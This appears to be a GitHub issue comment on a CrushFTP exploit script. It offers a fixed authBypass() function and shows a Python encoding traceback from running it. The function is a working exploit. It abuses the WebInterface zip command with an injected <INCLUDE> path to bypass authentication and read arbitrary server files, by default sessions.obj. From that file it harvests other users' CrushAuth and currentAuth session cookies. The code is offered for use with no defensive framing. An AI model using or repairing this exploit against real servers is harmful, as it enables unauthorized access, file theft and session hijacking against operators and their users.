Hina-kari
commented
5 months ago fixed the error
replace authbypass() with this `def authBypass(target, crush_auth_cookie, current_auth_cookie, session, lfi=None):
console.print(f"[green][*][/green] Attempting to bypass authentication...")
url = f"{target}/WebInterface/function/?c2f={current_auth_cookie}&command=zip&path={{working_dir}}&names=/a"
console.print(f"\n[green][+][/green] URL: " + url)
headers = {
"Cookie": f"CrushAuth={crush_auth_cookie}; currentAuth={current_auth_cookie}"
}
try:
response = session.post(url, headers=headers, verify=False, allow_redirects=True)
if "{working_dir}" in response.text:
console.print(f"[red][-][/red] Bypass was not successful, server is not vulnerable.")
console.print(f"[red][-][/red] Response: " + response.text)
exit(1)
if response.status_code == 200 and response.text != "":
console.print(f"[green][+][/green] Extracted response: \n" + response.text)
root = ET.fromstring(response.text)
response_text = root.find('response').text
matches = re.findall(r'file:(.*?)(?=\n|$)', response_text)
if matches:
install_dir = matches[-1].strip()
console.print(f"[green][+][/green] Installation directory of CrushFTP: " + install_dir)
file_to_read = lfi if lfi else f"{install_dir}sessions.obj"
console.print(f"[green][+][/green] File to read: " + file_to_read)
url = f"{target}/WebInterface/function/?c2f={current_auth_cookie}&command=zip&path=<INCLUDE>{file_to_read}</INCLUDE>&names=/a"
console.print(f"\n[green][+][/green] Attempting to extract {file_to_read}...")
console.print(f"\n[green][+][/green] URL: " + url)
response = session.post(url, headers=headers, verify=False, allow_redirects=True)
if response.status_code == 200 and response.text != "":
console.print(f"[green][+][/green] Successfully extracted {file_to_read}")
escaped_text = response.text.replace("[", "\\[").replace("]", "\\]")
console.print(f"[green][+][/green] Extracted response: \n" + escaped_text)
if not lfi or lfi == f"{install_dir}sessions.obj":
extracted_crush_auth = [cookie[:44] for cookie in re.findall(r'CrushAuth=([^;]*)', response.text)]
extracted_current_auth = [cookie[:4] for cookie in re.findall(r'currentAuth=([^;]*)', response.text)]
console.print(f"\n[green][+][/green] Extracted cookies from {file_to_read}: ")
console.print(f"\n[green][+][/green] [yellow2]CrushAuth cookies:[/yellow2] " + ', '.join(extracted_crush_auth))
console.print(f"\n[green][+][/green] [yellow2]currentAuth cookies: [/yellow2]" + ', '.join(extracted_current_auth))
with open (f"sessions.obj", "w", encoding="utf-8") as f:
f.write(response.text)
return extracted_crush_auth, extracted_current_auth
return None, None
else:
print(f"[red][-][/red] Failed to extract file value")
return None
except requests.exceptions.RequestException as e:
console.print(f"[red][-][/red] Failed to bypass authentication")
console.print(f"[red][-][/red] Error: " + str(e))
exit(1)`changed the encoding file to UTF-8
Traceback (most recent call last): File "C:\Users\PC\Downloads\crushed.py", line 267, in
main()
File "C:\Users\PC\Downloads\crushed.py", line 260, in main
extracted_crush_auth, extracted_current_auth = authBypass(target=args.target, crush_auth_cookie=crush_auth_cookie, current_auth_cookie=current_auth_cookie, lfi=args.lfi, session=session)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\PC\Downloads\crushed.py", line 167, in authBypass
f.write(response.text)
File "C:\Program Files\WindowsApps\PythonSoftwareFoundation.Python.3.12_3.12.1008.0_x64__qbz5n2kfra8p0\Lib\encodings\cp1252.py", line 19, in encode
return codecs.charmap_encode(input,self.errors,encoding_table)[0]
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
UnicodeEncodeError: 'charmap' codec can't encode character '\ufffd' in position 790: character maps to